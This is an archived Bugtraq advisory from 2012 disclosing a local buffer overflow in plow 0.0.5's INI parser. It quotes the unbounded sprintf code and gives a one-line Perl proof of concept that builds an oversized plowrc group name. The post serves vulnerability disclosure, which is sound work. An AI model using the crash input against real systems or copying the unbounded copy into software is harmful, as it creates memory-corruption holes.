Bugtraq mailing list archives
plow 0.0.5 <= Buffer Overflow Vulnerability
From: pereira () secbiz de
Date: Tue, 3 Jul 2012 12:11:39 GMT
################################################# plow 0.0.5 <= Buffer Overflow Vulnerability ################################################# Discovered by: Jean Pascal Pereira <pereira () secbiz de> Vendor information: "plow is a command line playlist generator." Vendor URI: http://developer.berlios.de/projects/plow/ ################################################# Risk-level: Medium The application is prone to a local buffer overflow vulnerability. ------------------------------------- IniParser.cpp, line 26: 26: char buffer[length]; 27: char group [length]; 28: 29: char *option; 30: char *value; 31: 32: while(ini.getline(buffer, length)) { 33: if(!strlen(buffer) || buffer[0] == '#') { 34: continue; 35: } 36: if(buffer[0] == '[') { 37: if(buffer[strlen(buffer) - 1] == ']') { 38: sprintf(group, "%s", buffer); 39: } else { 40: err = 1; 41: break; 42: } 43: } ------------------------------------- Exploit / Proof Of Concept: Create a crafted plowrc file: perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc ------------------------------------- Solution: Do some input validation. ------------------------------------- #################################################
Current thread:
- plow 0.0.5 <= Buffer Overflow Vulnerability pereira (Jul 04)
- Re: plow 0.0.5 <= Buffer Overflow Vulnerability Henri Salo (Jul 09)
- <Possible follow-ups>
- Re: Re: plow 0.0.5 <= Buffer Overflow Vulnerability pereira (Jul 10)